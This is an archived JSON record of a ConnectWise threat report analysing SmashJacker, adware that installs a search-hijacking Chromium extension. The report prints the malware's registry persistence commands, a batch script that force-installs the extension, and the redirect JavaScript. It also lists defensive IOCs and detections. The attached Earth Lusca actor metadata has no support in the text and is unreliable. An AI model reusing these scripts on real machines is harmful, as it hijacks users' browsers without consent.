{ "id": "0ff5f418-a760-48aa-9005-3f4adc55ce92", "created_at": "2026-04-06T00:19:52.514822Z", "updated_at": "2026-04-10T03:36:47.806846Z", "deleted_at": null, "sha1_hash": "0ecffb74b1a826a46894980463e774ff1aac2978", "title": "SmashJacker | ConnectWise Threat Report", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 85970, "plain_text": "SmashJacker | ConnectWise Threat Report\r\nArchived: 2026-04-05 18:06:54 UTC\r\nExecutive Summary\r\nIn February and March, we noticed a surge in incidents all relating to a few different files that hadn't been\r\nconnected to any type of malware yet. Pivoting off the indicators from these findings, the CRU uncovered a\r\ncampaign spanning back to at least October of 2022 pushing a persistent Chromium extension via software, game,\r\nand movie pirating web pages that we are referring to as SmashJacker. This extension is used to hijack searches\r\nand push users through redirect chains to the domains they're navigating so the actors can receive affiliate\r\nkickbacks for \"directing\" the user to that site, generate ad revenue, and collect analytics on victims.\r\nAnalysis\r\nInitial Access\r\nUsers are lured to download the installer files by having them hosted on pages advertising the download of\r\nwallpapers, software, games, and movies, typically illegally. They are first served the malicious installer, but then\r\ntrying the download again will serve the proper file. It's worth noting that in all the URLs leading to an installer\r\ndownload contain the empty URL parameter 7fk8qechol=. This is a useful indicator and is referenced by the\r\nextension later.\r\nThroughout our analysis, we found mostly InnoSetup and MSI installers being used to deliver this malicious\r\nextension. The MSI installers were all trojanized versions of 7zip that would deliver the extension along with a\r\nlegitimate install of the archiving tool. InnoSetup installers only installed the extension, but masqueraded as either\r\none of the types of files outlined above or were simply named Your File Is Ready To Download.exe. Both\r\nversions deliver similar payloads, and in some cases, if a targeted browser isn't found, nothing will be dropped.\r\nMost of the samples were signed using a handful of different certificates.\r\nPersistence\r\nSoon after launching the installer, it gets to work on persisting. We found two persistence techniques in use\r\ndepending on the variant downloaded. Sometimes it would use the AppInit_DLLs registry value to persist by\r\ncalling the reg command:\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v \"AppInit_DLLs\" /t REG_SZ /d \"C:\\Users\\[U\r\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v \"LoadAppInit_DLLs\" /t REG_DWORD /d 1 /f\r\nThis makes it so that the dropped dll is executed every time a process is created, and if it's one of the targeted\r\nbrowsers then the dll will make sure the extension files exist by unzipping them from an archive embedded in its\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 1 of 13\n\nresources section. Then it will create a batch file for running the proper browser with the malicious extension\r\nloaded.\r\nIn other instances, the installer will drop and run an executable that takes responsibility for its own persistence.\r\nWhen it runs it creates several files: reg.xml is an xml formatted scheduled task that runs every 5 minutes and\r\nruns the persistence executable that created it, notably all samples we reviewed had registration and start boundary\r\ndates of 2022-11-11. reg.bat is a batch file that simply contains the command to schedule the xml task:\r\nschtasks.exe /Create /XML \"%localappdata%\\{path}\\reg.xml\" /tn {task name}\r\nLastly, another batch file for the targeted browser is created that handles installing the extension. An example is\r\nincluded below:\r\n@echo off\r\nset version=1.0\r\nset id=fegdfodkkeaklllcdkpjeakecpfdfmdc\r\nset base32=HKLM\\SOFTWARE\r\nset base64=HKLM\\SOFTWARE\\WOW6432Node\r\nset chrome=Google\\Chrome\r\nset helper=%LocalAppdata%\\WindowsApp\\apps-helper\r\nset file=%helper%\\apps.crx\r\nREG DELETE %base32%\\Policies\\%chrome% /f\r\nREG DELETE %base32%\\%chrome%\\Extensions\\%id% /f\r\nREG DELETE %base64%\\%chrome%\\Extensions\\%id% /f\r\nREG ADD \"%base32%\\Policies\\%chrome%\\ExtensionInstallAllowlist\" /v \"1\" /t REG_SZ /d %id% /f\r\nREG ADD \"%base32%\\%chrome%\\Extensions\\%id%\" /v \"path\" /t REG_SZ /d \"%file%\" /f\r\nREG ADD \"%base32%\\%chrome%\\Extensions\\%id%\" /v \"version\" /t REG_SZ /d %version% /f\r\nREG ADD \"%base64%\\Policies\\%chrome%\\ExtensionInstallAllowlist\" /v \"1\" /t REG_SZ /d %id% /f\r\nREG ADD \"%base64%\\%chrome%\\Extensions\\%id%\" /v \"path\" /t REG_SZ /d \"%file%\" /f\r\nREG ADD \"%base64%\\%chrome%\\Extensions\\%id%\" /v \"version\" /t REG_SZ /d %version% /f\r\ntaskkill /F /IM chrome.exe /T\r\nstart \"\" \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --profile-directory=\"Default\" --no-startup-wind\r\nset chrome_ext0=\"%LocalAppdata%\\%chrome%\\User Data\\Default\\Extensions\\%id%\"\r\nif not exist %chrome_ext0% (timeout 1 \u003e NUL) else (echo \"Wait 1\")\r\nif not exist %chrome_ext0% (timeout 1 \u003e NUL) else (echo \"Wait 2\")\r\n[...]\r\nif not exist %chrome_ext0% (timeout 1 \u003e NUL) else (echo \"Wait 30\")\r\ntimeout 5 \u003e NUL\r\nREG ADD \"%base32%\\Policies\\%chrome%\\ExtensionInstallForcelist\" /v \"1\" /t REG_SZ /d %id% /f\r\nREG ADD \"%base64%\\Policies\\%chrome%\\ExtensionInstallForcelist\" /v \"1\" /t REG_SZ /d %id% /f\r\ntimeout 5 \u003e NUL\r\ntaskkill /F /IM chrome.exe /T\r\nstart \"\" \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --profile-directory=\"Default\"\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 2 of 13\n\nFirst it adds keys for the extension's id in the targeted\r\nbrowser's Extension and ExtensionInstallAllowList registry keys with the path to the extension's .crx file. Then\r\nit will use taskkill to kill running browsers. In some variations is tries to kill Chrome, Brave, Opera, Vivaldi, and\r\nEdge. Then it restarts the targeted browser and passes it a path to a bootstrapping extension through the --load-extension parameter. This is a smaller browser extension with two files usually called service.js and web.js. This\r\nextension's whole purpose is to ensure the main extension gets loaded into the browser after being set in the\r\nregistry. service.js adds a listener for installed extensions so that when its own installation triggers, it will open a\r\ntab with the chrome://policy page and call a function in web.js. This function adds a listener for when\r\nthe chrome://policy page loads and clicks the reload policies button to ensure the policy registry keys modified\r\nearlier are loaded into the browser. Meanwhile, the batch script is checking if the extension is installed yet,\r\nafterwards it will add its extension id to the browser's ExtensionInstallForcelist registry key, then kill the\r\nbrowser and restart it again without the bootstrapping extension loaded. In the dll versions of the extension there is\r\nno .crx file or bootstrapping extension, just what would be the contents of the .crx file.\r\nPost-Install\r\nImmediately after the installation is completed, the targeted browser is then opened directly to an actor-controlled\r\npage:\r\n\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" https://getfiles[.]wiki/welcome.php\r\nThis will be a part of a redirection chain through pages such as https://exturl[.]com/r.php?key=\r\n[KEY] or https://offersss[.]click/r.php?payout=OPTIONAL\u0026cnv_id=[ID]. These end up redirecting to Google\r\nafter gathering data about users through trackers such as histats and dtscout.\r\nMalicious Extension\r\nThe extension itself usually consists of three main components that can vary between samples. There is\r\nthe manifest.json file, which is common to all Chromium extensions. Several versions of this file consistently list\r\nthe author as sg.guru1030@gmail[.]com, and many will use the chrome_settings_overrides configuration to\r\nchange the default search provider for the browser to searchesmia[.]com.\r\nThe main logic of the extension is in one of the remaining two main components, sometimes\r\nin background.js and other times in content.js. When the main logic is in content.js, then usually it just contains\r\na simple search hijacking script that replaces common search engine query URLs with queries\r\nto searchesmia[.]com. An example is included below. We observed samples targeting Google, DuckDuckGo,\r\nEcosia, Yahoo, Ask, Neeva, Aol, Webcrawler, Dogpile, Bing, and Info. When content.js is the main\r\nscript, background.js merely contains a function that writes out to the console here is background!\r\nfunction checkUrlIsSearchEngine(url) {\r\n // var hostName = getHost(url)\r\n if (url.match(/^https?:.*?google.*?\\/search?/g) != null) {\r\n var searchQuery = getQuery(url);\r\n location.replace(`https://searchesmia.com/bingchr9?q=${searchQuery}`)\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 3 of 13\n\n}\r\n if (url.match(/^https?:.*?duckduckgo.*?\\/?q=/g) != null) {\r\n var searchQuery = getQuery(url);\r\n location.replace(`https://searchesmia.com/bingchr9?q=${searchQuery}`)\r\n }\r\n if (url.match(/^https?:.*?ecosia.*?\\/?search?/g) != null) {\r\n var searchQuery = getQuery(url);\r\n location.replace(`https://searchesmia.com/bingchr9?q=${searchQuery}`)\r\n }\r\n if (url.match(/^https?:.*?yahoo.*?\\/?search?/g) != null) {\r\n var searchQuery = getQuery(url, 'yahoo');\r\n location.replace(`https://searchesmia.com/bingchr9?q=${searchQuery}`)\r\n }\r\n}\r\nSearches routed through searchesmia[.]com will return a page meant to look like Google search results, but with\r\ndifferent ads served on it in an attempt to generate ad revenue for the actors.\r\nThings get a bit more interesting when background.js contains the main logic of the extension. In these cases, we\r\nare faced with a lightly obfuscated script with more features than just search hijacking. The search hijacking is\r\nstill present, but now we are faced with evasion mechanisms such as closing tabs that try to navigate to the\r\nbrowser's ://extensions page or chrome://settings/reset to keep the extension from being uninstalled.\r\nThe bigger capability we see added is the ability to redirect users from a variety of different pages they may be\r\ntrying to access through actor infrastructure and back out to the originally intended page with the actor's affiliate\r\nparameters tacked onto the URL. First, for every tab update it will check if a URL contains either 7fk8qechol,\r\nwhich was mentioned earlier in the article as an identifier for all of their initial payload delivery URLs, or the\r\nextension's id. If either of those are present it will close the tab, otherwise it will compare the domain of the page\r\nbeing visited to an extensive list of domains. If there is a match, it will redirect the page navigation\r\nthrough https://smashaff[.]com/redirect?\u0026url=[DOMAIN], which will process the request differently\r\ndepending on the domain being requested. This is done to redirect the user back to it in an attempt for the actor to\r\nreceive affiliate kickbacks. After this, the extension will set a future time for that domain in a cookie, so it won't\r\nprocess that domain again until that time has passed. Usually this will be 2 hours, except for an Amazon domain,\r\nwhich is granted a 24-hour waiting period.\r\nPossible Connections\r\nOur initial hypothesis was that this campaign represented a shift in ChromeLoader delivery methods. The usage of\r\npages pushing pirated media to lure victims, file name conventions such as the common Your File Is Ready To\r\nDownload, and the eventual payload of a search hijacking browser extension hinted in the direction of\r\nChromeLoader. Additionally, we observed historical trends of known ChromeLoader delivery formats, from their\r\nfirst variants delivering AutoHotkey files, to the more popular variant delivered via disc image files. When we\r\nadded on the timeline of incidents related to the installer media, we ended up with a graph that appeared to show a\r\nconvincing story of shifting trends in ChromeLoader delivery media.\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 4 of 13\n\nThreat Report - SmashJacker Graph.png\r\nOccasionally we would also find other loose connections, such as a domain and URL patterned similarly to others\r\nused by the actors behind this extension redirecting to search hijack pages patterned similarly to those used by\r\nChromeLoader.\r\nThreat Report - SmashJacker Image 2.png\r\nBut the usage of pirated media sites and similar naming conventions aren't unique to ChromeLoader and may just\r\nbe indicative of a different set of actors that offer their distribution network as a service for many different\r\npayloads. The timeline may be tainted due to lack of awareness of other changes in ChromeLoader techniques that\r\nmay have affected our ability to tag related incidents. And the loose connections we found always remained loose.\r\nAdditionally, during our search for ChromeLoader samples that were starting to use installers that ended up\r\nturning up results for a different malicious extension, we actually did end up finding a recent msi sample that does\r\ndrop already known ChromeLoader payloads, which only muddied the waters further. It may be the case that the\r\nactors behind ChromeLoader also developed this extension and delivery path, but currently we don't have any\r\nother data that would warrant higher confidence in this hypothesis.\r\nWe did find other interesting connections though. One word kept recurring in various places during the\r\ninvestigation, Smash. Some installers quickly showed they were installing something called Smash. Many of the\r\ndomains incorporate the word Smash. Particularly there is the smashbrowser[.]com domain that victims are sent\r\nto, in some cases, immediately after install. Outside of the post-install victim tracking pages, this web site also\r\noffers a browser, search results for which are full of guides on how to remove it as adware.\r\nThreat Report - SmashJacker - Smashbrowser.png\r\nThis was interesting, because during log searches for extension indicators we found another browser called\r\nChromnius matching on a large amount of the indicators we have seen being used by SmashJacker. Search results\r\nfor it also turn up mostly results referring to it as adware and suggesting its removal. Spotting the similarities\r\nbetween the two is left to the reader.\r\nThreat Report - SmashJacker - Chromnius.png\r\nFurther, through the domain smashaff[.]com we also connected the malicious extension here to a report by\r\nGuardio about a large amount of extensions available in Chrome and Edge stores very similar to the variants\r\nobserved in our research.\r\nThese potential connections suggest a much broader operation with many possible delivery avenues and payloads,\r\nand potential connections to ChromeLoader, with the goal of generating revenue via ads and affiliate kickbacks.\r\nAdware like this may not typically gain as much attention as other malware whose impact is more immediate, but\r\nconsidering the massive scope of this campaign and the ability to fly more under the radar that lack of concern\r\nallows, it's always worth considering the sort of access to data in your organization these actors have even just\r\nthrough searches and analytics.\r\nSIEM Detections\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 5 of 13\n\n[CRU][Windows] AppInit DLLs\r\n[CRU][Windows] Common Filename for Adware Distribution (Your File Is Ready To Download)\r\n[CRU][Windows] Browser Extension Loaded via Command Line\r\n[CRU][Windows] Chromium Extension Install Attempt in Registry via Command Line\r\nMITRE ATT\u0026CK Techniques Utilized\r\nT1189 – Drive-by Compromise\r\nT1053.005 – Scheduled Task/Job: Scheduled Task\r\nT1204.002 – User Execution: Malicious File\r\nT1546.010 – Event Triggered Execution: AppInit DLLs\r\nT1176 – Browser Extensions\r\nT1565.002 – Data Manipulation: Transmitted Data Manipulation\r\nIOCs\r\nDirectories\r\n%LOCALAPPDATA%\\ServiceApp\r\n%LOCALAPPDATA%\\ServiceApp\\apps-helper\r\n%LOCALAPPDATA%\\WindowsApp\r\n%LOCALAPPDATA%\\WindowsApp\\googledoc\r\n%LOCALAPPDATA%\\WindowsApp\\apps-helper\r\n%LOCALAPPDATA%\\ServApps\r\n%LOCALAPPDATA%\\ServApps\\apps-helper\r\n%LOCALAPPDATA%\\SysWins\r\n%LOCALAPPDATA%\\MicroApp\r\n%LOCALAPPDATA%\\MicroApp\\apps-helper\r\n%LOCALAPPDATA%\\SystemConfigs\r\nDomains\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 6 of 13\n\nexturl[.]com\r\ngetfiles[.]wiki\r\ngetfiles[.]click\r\noffersss[.]click\r\nsmashbrowser[.]com\r\nofferszzzz[.]click\r\nsearchesmia[.]com\r\nbestsearch[.]ai\r\ndownloads[.]miami\r\ngetyourfile[.]cloud\r\ndownloadit[.]wiki\r\nsmashaff[.]com\r\nchangecolorss[.]com\r\ncampaignfreekek[.]monster\r\ncampaignfreekek[.]buzz\r\ncampaignkeepy[.]buzz\r\nfileskeepdownload[.]lol\r\ncampaignloader[.]buzz\r\ncampaignkeepy[.]monster\r\ncampaignlyfilez[.]lol\r\ncampaignindown[.]buzz\r\ncampaignindown[.]lol\r\ncampaignloede[.]buzz\r\ncampaignloede[.]monster\r\ncampaigndowna[.]skin\r\ncampaigndowna[.]monster\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 7 of 13\n\ncampaigndowna[.]pics\r\ncampaignleka[.]skin\r\ndownloadkeppy[.]lol\r\ndownloadkeppy[.]buzz\r\nfiledownloader[.]cloud\r\ndownloadwikiki[.]lol\r\ndownloaderfiles[.]wiki\r\nfreefilesdownloads[.]wiki\r\nfilesdownloader[.]one\r\npyrd5[.]xyz\r\nExtension IDs\r\njncffhgjbmpggpdflbbkhdghjipdbjkn\r\nmacjkjgieeoakdlmmfefgmldohgddpkj\r\niglfjaeojcakllgbfalclepdncgidelo\r\nlehiajjpggngcmnjmbjcdohhfijojgid\r\nfebnklnineliajdemdahoiplahfbmffk\r\njmhjnioknjbokpffmnlkdchehoeledda\r\nfegdfodkkeaklllcdkpjeakecpfdfmdc\r\nRegistry Keys\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs\r\nHKLM\\SOFTWARE\\Google\\Chrome\\Extensions\r\nHKLM\\SOFTWARE\\Microsoft\\Edge\\Extensions\r\nHKLM\\SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallAllowlist\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallAllowlist\r\nHKLM\\SOFTWARE\\Policies\\Google\\Chrome\\ExtensionInstallForcelist\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 8 of 13\n\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist\r\nHKLM\\SOFTWARE\\WOW6432Node\\Google\\Chrome\\Extensions\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Edge\\Extensions\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Google\\Chrome\\ExtensionInstallForcelist\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\Edge\\ExtensionInstallForcelist\r\nScheduled Task Names\r\nChromeUpdatess\r\nChrUpdate\r\nGoogleUpdate\r\nFile Signing Certificates\r\nLIMESTONE DIGITAL LIMITED\r\n2aae66915908a703d5059da2fcf4d5245b78bb30\r\nFTechnology Limited\r\n8ef055874b2f22f2653a7fd0f7244ef26f48ee5d\r\nTEKVIVE LTD\r\n48688c5a67c8abcaabb12024e9bbd4b5c2599991\r\nTELIX LIMITED\r\nf7ead36c07f11fe932e6baca357f2610c550cee3\r\nTECKHA LTD\r\n55d44799c5f51d3b08e957f89b930f014ce54945\r\nSOFTWARE ABFG LTD\r\nee81e7d510b97695351ef3f2e0c10f4d0601eda6\r\nInnoSetup Hashes\r\n3a3532fed3673bfb65fd8271ebf0c029cffddb76f4d6b0315cb47cf46eabc31d\r\nae2250acbdd6bd9cda9259ecd1a211e8a22d4122de3687c4cd31321673bbf875\r\nfe5fa373eb6232059a47076fe1315d3499480da8b7e357bd8fc08caa05b03af1\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 9 of 13\n\n26bec2d9c0843b1a583e7f17d810d92c750a909c48b5565e2fa0a8920356f457\r\n1857ae53c297c522361108dab313e9f83ec7802af37edaffdcd1002b6e4cb54c\r\nf8f27ae04481c96fdc875300dee32d19017a888d730e1f1586163be2a6a55176\r\n1d180bd0d9a05b4c3883b99fcf9b5502bf30b35b2e09d4ba4ab2111079b3221e\r\ncafbf35c0d9cf556d2c92086e0145ed092959eb725d6a8134adb9df835ad4a9d\r\nc851a6b21ec14b6964c107a2bfaeb8db1b22ab4e967c881f4e6e76877c452761\r\n093d15f885cc4a9993a2425c6dff5f86d421056642473074746927eecce43fe7\r\n3494f9352c5bd48f55caddbbb63515f8058763e28f8e5f8fa5411a5de835ca8e\r\n87c79d29737dca30e36aac1c90ac3eab82f71393b815a9d7c086565e257fd434\r\nea6443416c31bb5f5d8476357619c3c9b80d3959742b8f3080b56ce8c24b9429\r\n147e1b5a750fbfd8863449d523e3d6d110defceb74ad9cdb7c939ab75ffa2180\r\n20e1aabfaad727ba939133691a7c0ab34401f1c973e2611d8585ef1699670dff\r\n1e7058ee1fbec5524de39dadf1cadc6557b53a5e764296155ecb63adb1a8721a\r\nb1256289d4aaada74a40b6ca52aa0d382b7660943ea31744486007653ee925ad\r\n2df3f0c50942cebf7d508364ade31de19a84a6d9377a7799b626abdf8f09a9bb\r\n783c4c0ee5b6202ecb437c9c6b277376344f4784b672db9115551559322834a4\r\nfa8b150a06d2ccee4aee81ee84fda0e1269b8aed5efdb0f3c22f2d0b154e470a\r\nc8e02aa1de118d17878ca909f266fd9b97957d911e20659ab355a5e868fd4d3c\r\n8ac240ad76b8af9f85a1aea9cac3a993b8be99b342de8827621f1ad9c0209404\r\na837c3ad6bf70e148282b1d4964fc63ab5e75f6fa7596205db50cb9db76e8b29\r\n.msi Hashes\r\n017388719abfb911787abd2fa1b6b12a806660761b8ae4efe12196efc447e8d2\r\nac3312c712ff50e93d62a1696e3997fdf7d9a9eb01c589d26ac6c3189e50dfc8\r\naf11fc54dc1633b963304f22ac014a7af86c8ab904b29de2141fa63bf75fb488\r\nb063cb2736356fba41055ea2cc4d69a3108b7028de97c96420dd206788ea85a5\r\nc8a606a63da9206a1a308fa8696c8cbfa42510970d1888aeb7e605c94b98a8ec\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 10 of 13\n\n192ab51d793a4a1ab84d69146566d203168df26b64b3886813262113f4e21951\r\n384dcaac36183b76183e4e1f0decf3b035f97c353d6c9846dc04249e95e22587\r\n4f55de6fa77a36b9e5ec04fb6222f26f4e757dbc492c22af4f907f7ae3ace3a1\r\n7fc333a6e310cfe08b2b12649d3bc502eb355819d60937ceb4b54d0b85019aba\r\n87e6fb021b834187f819c2718f5119ffc07fc941fe17eb436ed8533a4867c475\r\n936416f151886041c3f0e50ec57a101ee008c18126f2523ca3335dad07f1c112\r\nDropped File Hashes\r\nInstallExtension.exe/App.exe/EdgeInstall.exe/ChromeInstall.exe\r\n3d4fc14fccb7e4adb4854f6da66bbb7b829e354a2f88b998d6f3ba9fbb8f141d\r\n5ee53990ddd5924f27744a565e06c12667018210dfc18e444b8f468402a86023\r\n1eb53fb5dd3f2437eb50fe1668f2d1edc9f3209a7f21f33192117afdf7e38208\r\n920f528cdf720187b49ee99274a5bf75ad392c9ae7eeecca803ec049aea2bd36\r\na9d5c1acfe3af5f3ac2c4d7caf04da163b21a6f835ea0dfaf36a38b058e7f43e\r\next.dll/sxsshell.dll/sxsext.dll\r\ne788ffef53cedbcc81fa19933a0940a5d5110a8f2abff32d0fd6050f113be4d9\r\n0d12cc1590d4ef968d6fcfbbd865a9f41ab0e85f7ca820de87ed8672e972c6cc\r\n7387f56531b5e46e0f3ffa5a9cfc888bc46be8f9d5d44267f4649daeb5c9519e\r\n5e53711bec7270509b71db47ac5c72a6249d8b724d32b0e7c836648d304887c6\r\nchrome.bat/edge.bat/install.bat\r\n99f181734dd78a4b37eeb502bc34cb332151cf486ddca19f6c64f1a6755d7ef1\r\n56321f7b7764686960f7c51ace571217bcec1d6613884b1003296406a55ddf90\r\n448641c0707a0beb2fdb2b2195a8aa3965a3ca27ddf745160c3caad38a21401a\r\n1e90cf8498a2684dcd09b6b12784f1c6bada64c1148779286f0c734b5df3c245\r\n9b8c45da4e4f713d57ba1377fb3f66537b3de3761aa2c9ae8ecf66a4495e63d4\r\ne488d824f6d39b999a9e15719933a6afdabe7f45a482aac5626fe2d91bf43ae2\r\n7487a70f1e368a216b5b99d2683469d9ac79352e84cde2627fcce642a6ed062a\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 11 of 13\n\neecb39d2dc5efd9461cdb4d6644057f3c13a9b17d9d0385ddfcae260e9ea70a8\r\nb4ce8670b04dbfd47cad089ef826cb18568896677202b6f255ec1161581eb49c\r\n6ab2311de65c8ec6fa42c01b9cbe8443b16304076e51b005b87aea95e50b5be2\r\nf985cb1e542dd54e54dea13add450fd38208a62dda2bb850468618ca33736f03\r\nreg.bat/reg.xml\r\n935bce606159c44bd2697eced5cae4a6e78505662226de44647a8278d0b65897\r\n10c8a00927ca6d784a0a9d80c85a9252edc514e1851659af67ecd5bcd9d0c6b7\r\ned89a8377e2782212035d3d30d62344a1e2d51c4d0976adb070c7c6eb9d0fc20\r\nbffcc7888901c9b26c192691b32a0aa724c23da987d92904dc808d768c04f690\r\n9d9cb847255137e1f2daf88f4790f01fdff91215c60712fbb88274bd3c95fb87\r\ncf3a292cf651d6363c5f3d21812b240c48657f6c951e779eafaf15fa7ef39972\r\nc44029eeff28e0ca064e379cb929916b659c440da1f5a29855012bd909eaa084\r\n707aa512b5f4fea301b379582a16e5e2b729005562623d9ea729d80d6c98c7d8\r\nExtension Files\r\ncontent.js/service.js/manifest.json/background.js/web.js/apps.crx\r\n0626d33f723c33ed98f9e8c1a78b43510e6dbd196ef91fc0be2633ba73b91649\r\ncc1c1c7aa14ac707f66629095b8e117109660c13511f26d6eeda1e9fdc363ab2\r\n0ade971ae68ae6d818e9837ab8c6d4d603ac0bb3d23aa78a0f5d1b91706e155e\r\n4684f8c339c510e146b89f1fa3274b1475851e06f0c347ab07821846bdb066a4\r\n893fcfe4edcdb07bcc3e05a3304f93f0358c9d8f4cc967058585f553bb82ad02\r\na507d1f546c979056ce392467ede397c94ef854d9b5c7581462feef6e9b091ef\r\n0f9d206423e5e197adf17fe478f0001a6309bf0cd1931b6607b17dc4a2600d28\r\n3003c376b4ddca73cbd7a761c7e19adea52ed056c6c0e6ebecf67ce1a833b061\r\nbeefb9d3af534d2fdd069dbe4b2b72b0e840f1a8bcf676d06746321a73216dd6\r\n639b4aa439b6230d88445db584ce81835a8236c4cc5b0610c8ecc728941693b7\r\n7fd6486432256c15fa6568f04af2db56de31e9aecc16044b3d5b488957a7bcc2\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 12 of 13\n\nbfb7f6dc266847896a21a8513d639eabf3f74d2a2def95104459ad322b13fac6\r\n092d00e4b89dce6b18c654d9b5af4cdd7c0da2d304f139820efeecaa5c4eb16c\r\n4bcec38345ddc32954a86c529fd1058187e56cc7d576fd767e272a02ba7a97f6\r\nf0097f5ed7261f23aec2434d73295165d708cdfc239c33e6990071119087a495\r\nd5e3087257045d015dd02186cba8427946b174eaaa40f180f3b017ba9d6c8837\r\n85975a9d26e942b1804195c9b5a2afc72fc8faf245af064d81522d0d7d1823f1\r\n092f386c78aef402225279c45d519ea6abfb2ce07a735bb1288529c20b1f5db9\r\n1f462fbc4be05d97a3865014a1af20c8f137828993b59cecfc774193d493653d\r\nSource: https://www.connectwise.com/blog/threat-report/smash-jacker\r\nhttps://www.connectwise.com/blog/threat-report/smash-jacker\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.connectwise.com/blog/threat-report/smash-jacker" ], "report_names": [ "smash-jacker" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434792, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0ecffb74b1a826a46894980463e774ff1aac2978.pdf", "text": "https://archive.orkl.eu/0ecffb74b1a826a46894980463e774ff1aac2978.txt", "img": "https://archive.orkl.eu/0ecffb74b1a826a46894980463e774ff1aac2978.jpg" } }